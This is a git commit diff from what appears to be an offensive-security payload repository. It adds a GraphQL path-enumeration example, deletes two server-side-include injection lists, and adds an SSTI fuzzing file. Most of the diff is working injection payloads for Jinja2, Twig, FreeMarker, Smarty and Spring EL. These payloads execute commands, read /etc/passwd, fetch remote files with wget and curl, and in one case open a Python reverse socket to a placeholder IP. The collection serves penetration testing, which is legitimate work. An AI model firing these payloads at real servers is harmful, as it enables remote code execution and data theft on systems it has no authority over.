Fix - SSTI Payloads
This commit is contained in:
parent
0de5cb7123
commit
95fed140ec
@ -24,6 +24,7 @@
|
||||
* [GraphQLmap - Scripting engine to interact with a graphql endpoint for pentesting purposes](https://github.com/swisskyrepo/GraphQLmap)
|
||||
* [GraphQL-voyager - Represent any GraphQL API as an interactive graph](https://apis.guru/graphql-voyager/)
|
||||
* [GraphQL Security Toolkit - GraphQL Security Research Material](https://github.com/doyensec/graph-ql/)
|
||||
* [Graphql-path-enum - Lists the different ways of reaching a given type in a GraphQL schema](https://gitlab.com/dee-see/graphql-path-enum)
|
||||
* [GraphQL IDE - An extensive IDE for exploring GraphQL API's](https://github.com/andev-software/graphql-ide)
|
||||
* [InQL - A Burp Extension for GraphQL Security Testing](https://github.com/doyensec/inql)
|
||||
* [Insomnia - Cross-platform HTTP and GraphQL Client](https://insomnia.rest/)
|
||||
@ -155,6 +156,28 @@ query IntrospectionQuery {
|
||||
}
|
||||
```
|
||||
|
||||
### List path
|
||||
|
||||
```php
|
||||
$ git clone https://gitlab.com/dee-see/graphql-path-enum
|
||||
$ graphql-path-enum -i ./test_data/h1_introspection.json -t Skill
|
||||
Found 27 ways to reach the "Skill" node from the "Query" node:
|
||||
- Query (assignable_teams) -> Team (audit_log_items) -> AuditLogItem (source_user) -> User (pentester_profile) -> PentesterProfile (skills) -> Skill
|
||||
- Query (checklist_check) -> ChecklistCheck (checklist) -> Checklist (team) -> Team (audit_log_items) -> AuditLogItem (source_user) -> User (pentester_profile) -> PentesterProfile (skills) -> Skill
|
||||
- Query (checklist_check_response) -> ChecklistCheckResponse (checklist_check) -> ChecklistCheck (checklist) -> Checklist (team) -> Team (audit_log_items) -> AuditLogItem (source_user) -> User (pentester_profile) -> PentesterProfile (skills) -> Skill
|
||||
- Query (checklist_checks) -> ChecklistCheck (checklist) -> Checklist (team) -> Team (audit_log_items) -> AuditLogItem (source_user) -> User (pentester_profile) -> PentesterProfile (skills) -> Skill
|
||||
- Query (clusters) -> Cluster (weaknesses) -> Weakness (critical_reports) -> TeamMemberGroupConnection (edges) -> TeamMemberGroupEdge (node) -> TeamMemberGroup (team_members) -> TeamMember (team) -> Team (audit_log_items) -> AuditLogItem (source_user) -> User (pentester_profile) -> PentesterProfile (skills) -> Skill
|
||||
- Query (embedded_submission_form) -> EmbeddedSubmissionForm (team) -> Team (audit_log_items) -> AuditLogItem (source_user) -> User (pentester_profile) -> PentesterProfile (skills) -> Skill
|
||||
- Query (external_program) -> ExternalProgram (team) -> Team (audit_log_items) -> AuditLogItem (source_user) -> User (pentester_profile) -> PentesterProfile (skills) -> Skill
|
||||
- Query (external_programs) -> ExternalProgram (team) -> Team (audit_log_items) -> AuditLogItem (source_user) -> User (pentester_profile) -> PentesterProfile (skills) -> Skill
|
||||
- Query (job_listing) -> JobListing (team) -> Team (audit_log_items) -> AuditLogItem (source_user) -> User (pentester_profile) -> PentesterProfile (skills) -> Skill
|
||||
- Query (job_listings) -> JobListing (team) -> Team (audit_log_items) -> AuditLogItem (source_user) -> User (pentester_profile) -> PentesterProfile (skills) -> Skill
|
||||
- Query (me) -> User (pentester_profile) -> PentesterProfile (skills) -> Skill
|
||||
- Query (pentest) -> Pentest (lead_pentester) -> Pentester (user) -> User (pentester_profile) -> PentesterProfile (skills) -> Skill
|
||||
- Query (pentests) -> Pentest (lead_pentester) -> Pentester (user) -> User (pentester_profile) -> PentesterProfile (skills) -> Skill
|
||||
- Query (query) -> Query (assignable_teams) -> Team (audit_log_items) -> AuditLogItem (source_user) -> User (pentester_profile) -> PentesterProfile (skills) -> Skill
|
||||
- Query (query) -> Query (skills) -> Skill
|
||||
```
|
||||
|
||||
### Extract data
|
||||
|
||||
|
@ -1,75 +0,0 @@
|
||||
<pre><!--#exec cmd="ls" --></pre>
|
||||
<pre><!--#echo var="DATE_LOCAL" --> </pre>
|
||||
<pre><!--#exec cmd="whoami"--></pre>
|
||||
<pre><!--#exec cmd="dir" --></pre>
|
||||
<!--#exec cmd="ls" -->
|
||||
<!--#exec cmd="wget http://website.com/dir/shell.txt" -->
|
||||
<!--#exec cmd="/bin/ls /" -->
|
||||
<!--#exec cmd="dir" -->
|
||||
<!--#exec cmd="cd C:\WINDOWS\System32">
|
||||
<!--#config errmsg="File not found, informs users and password"-->
|
||||
<!--#echo var="DOCUMENT_NAME" -->
|
||||
<!--#echo var="DOCUMENT_URI" -->
|
||||
<!--#config timefmt="A %B %d %Y %r"-->
|
||||
<!--#fsize file="ssi.shtml" -->
|
||||
<!--#include file=?UUUUUUUU...UU?-->
|
||||
<!--#echo var="DATE_LOCAL" -->
|
||||
<!--#exec cmd="whoami"-->
|
||||
<!--#printenv -->
|
||||
<!--#flastmod virtual="echo.html" -->
|
||||
<!--#echo var="auth_type" -->
|
||||
<!--#echo var="http_referer" -->
|
||||
<!--#echo var="content_length" -->
|
||||
<!--#echo var="content_type" -->
|
||||
<!--#echo var="http_accept_encoding" -->
|
||||
<!--#echo var="forwarded" -->
|
||||
<!--#echo var="document_uri" -->
|
||||
<!--#echo var="date_gmt" -->
|
||||
<!--#echo var="date_local" -->
|
||||
<!--#echo var="document_name" -->
|
||||
<!--#echo var="document_root" -->
|
||||
<!--#echo var="from" -->
|
||||
<!--#echo var="gateway_interface" -->
|
||||
<!--#echo var="http_accept" -->
|
||||
<!--#echo var="http_accept_charset" -->
|
||||
<!--#echo var="http_accept_language" -->
|
||||
<!--#echo var="http_connection" -->
|
||||
<!--#echo var="http_cookie" -->
|
||||
<!--#echo var="http_form" -->
|
||||
<!--#echo var="http_host" -->
|
||||
<!--#echo var="user_name" -->
|
||||
<!--#echo var="unique_id" -->
|
||||
<!--#echo var="tz" -->
|
||||
<!--#echo var="total_hits" -->
|
||||
<!--#echo var="server_software" -->
|
||||
<!--#echo var="server_protocol" -->
|
||||
<!--#echo var="server_port" -->
|
||||
<!--#echo var="server_name -->
|
||||
<!--#echo var="server_addr" -->
|
||||
<!--#echo var="server_admin" -->
|
||||
<!--#echo var="script_url" -->
|
||||
<!--#echo var="script_uri" -->
|
||||
<!--#echo var="script_name" -->
|
||||
<!--#echo var="script_filename" -->
|
||||
<!--#echo var="netsite_root" -->
|
||||
<!--#echo var="site_htmlroot" -->
|
||||
<!--#echo var="path_translated" -->
|
||||
<!--#echo var="path_info_translated" -->
|
||||
<!--#echo var="request_uri" -->
|
||||
<!--#echo var="request_method" -->
|
||||
<!--#echo var="remote_user" -->
|
||||
<!--#echo var="remote_addr" -->
|
||||
<!--#echo var="http_client_ip" -->
|
||||
<!--#echo var="remote_port" -->
|
||||
<!--#echo var="remote_ident" -->
|
||||
<!--#echo var="remote_host" -->
|
||||
<!--#echo var="query_string_unescaped" -->
|
||||
<!--#echo var="query_string" -->
|
||||
<!--#echo var="path_translated" -->
|
||||
<!--#echo var="path_info" -->
|
||||
<!--#echo var="path" -->
|
||||
<!--#echo var="page_count" -->
|
||||
<!--#echo var="last_modified" -->
|
||||
<!--#echo var="http_user_agent" -->
|
||||
<!--#echo var="http_ua_os" -->
|
||||
<!--#echo var="http_ua_cpu" -->
|
@ -1,18 +0,0 @@
|
||||
</nowiki>
|
||||
<!--#echo var="DOCUMENT_NAME" -->
|
||||
<!--#echo var="DOCUMENT_URI" -->
|
||||
<!--#config timefmt="A %B %d %Y %r"-->
|
||||
<!--#echo var="DATE_LOCAL" -->
|
||||
<!--#include virtual="http://xerosecurity.com/.testing/rfi_vuln.php" -->
|
||||
<!--#include virtual="https://crowdshield.com/.testing/rfi_vuln.php" -->
|
||||
<!--#include virtual="/" -->
|
||||
<!--#exec cmd="ls" -->
|
||||
<!--#exec cmd="whoami" -->
|
||||
<!--#exec cmd="uname" -->
|
||||
<!--#exec cmd="dir" -->
|
||||
<!--#exec cmd="cat /etc/passwd" -->
|
||||
<!--#exec cmd="ipconfig" -->
|
||||
<!--#exec cmd="curl http://xerosecurity.com/.testing/rfi_vuln.php" -->
|
||||
<!--#exec cmd="perl -e 'print "X"*5000'" -->
|
||||
<!--#exec cmd="sleep 5" -->
|
||||
<!--#exec cmd="sleep 10" -->
|
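--- a/Server Side Template Injection/Intruder/ssti.fuzz
+++ b/Server Side Template Injection/Intruder/ssti.fuzz
@@ -0,0 +1,49 @@
+
+{{4*4}}[[5*5]]
+{{7*7}}
+{{7*'7'}}
+<%= 7 * 7 %>
+${3*3}
+${{7*7}}
+@(1+2)
+#{3*3}
+#{ 7 * 7 }
+{{dump(app)}}
+{{app.request.server.all|join(',')}}
+{{config.items()}}
+{{ [].class.base.subclasses() }}
+{{''.class.mro()[1].subclasses()}}
+{{ ''.__class__.__mro__[2].__subclasses__() }}
+{% for key, value in config.iteritems() %}<dt>{{ key|e }}</dt><dd>{{ value|e }}</dd>{% endfor %}
+{{'a'.toUpperCase()}}
+{{ request }}
+{{self}}
+<%= File.open('/etc/passwd').read %>
+<#assign ex = "freemarker.template.utility.Execute"?new()>${ ex("id")}
+[#assign ex = 'freemarker.template.utility.Execute'?new()]${ ex('id')}
+${"freemarker.template.utility.Execute"?new()("id")}
+{{app.request.query.filter(0,0,1024,{'options':'system'})}}
+{{ ''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read() }}
+{{ config.items()[4][1].__class__.__mro__[2].__subclasses__()[40]("/etc/passwd").read() }}
+{{''.__class__.mro()[1].__subclasses__()[396]('cat flag.txt',shell=True,stdout=-1).communicate()[0].strip()}}
+{{config.__class__.__init__.__globals__['os'].popen('ls').read()}}
+{% for x in ().__class__.__base__.__subclasses__() %}{% if "warning" in x.__name__ %}{{x()._module.__builtins__['__import__']('os').popen(request.args.input).read()}}{%endif%}{%endfor%}
+{$smarty.version}
+{php}echo `id`;{/php}
+{{['id']|filter('system')}}
+{{['cat\x20/etc/passwd']|filter('system')}}
+{{['cat$IFS/etc/passwd']|filter('system')}}
+{{request|attr([request.args.usc*2,request.args.class,request.args.usc*2]|join)}}
+{{request|attr(["_"*2,"class","_"*2]|join)}}
+{{request|attr(["__","class","__"]|join)}}
+{{request|attr("__class__")}}
+{{request.__class__}}
+{{request|attr('application')|attr('\x5f\x5fglobals\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fbuiltins\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fimport\x5f\x5f')('os')|attr('popen')('id')|attr('read')()}}
+{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"new java.lang.String('xxx')\")}}
+{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"var x=new java.lang.ProcessBuilder; x.command(\\\"whoami\\\"); x.start()\")}}
+{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"var x=new java.lang.ProcessBuilder; x.command(\\\"netstat\\\"); org.apache.commons.io.IOUtils.toString(x.start().getInputStream())\")}}
+{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"var x=new java.lang.ProcessBuilder; x.command(\\\"uname\\\",\\\"-a\\\"); org.apache.commons.io.IOUtils.toString(x.start().getInputStream())\")}}
+{% for x in ().__class__.__base__.__subclasses__() %}{% if "warning" in x.__name__ %}{{x()._module.__builtins__['__import__']('os').popen("python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"ip\",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/cat\", \"flag.txt\"]);'").read().zfill(417)}}{%endif%}{% endfor %}
+${T(java.lang.System).getenv()}
+${T(java.lang.Runtime).getRuntime().exec('cat etc/passwd')}
+${T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(99).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(32)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(101)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(99)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(112)).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(119)).concat(T(java.lang.Character).toString(100))).getInputStream())}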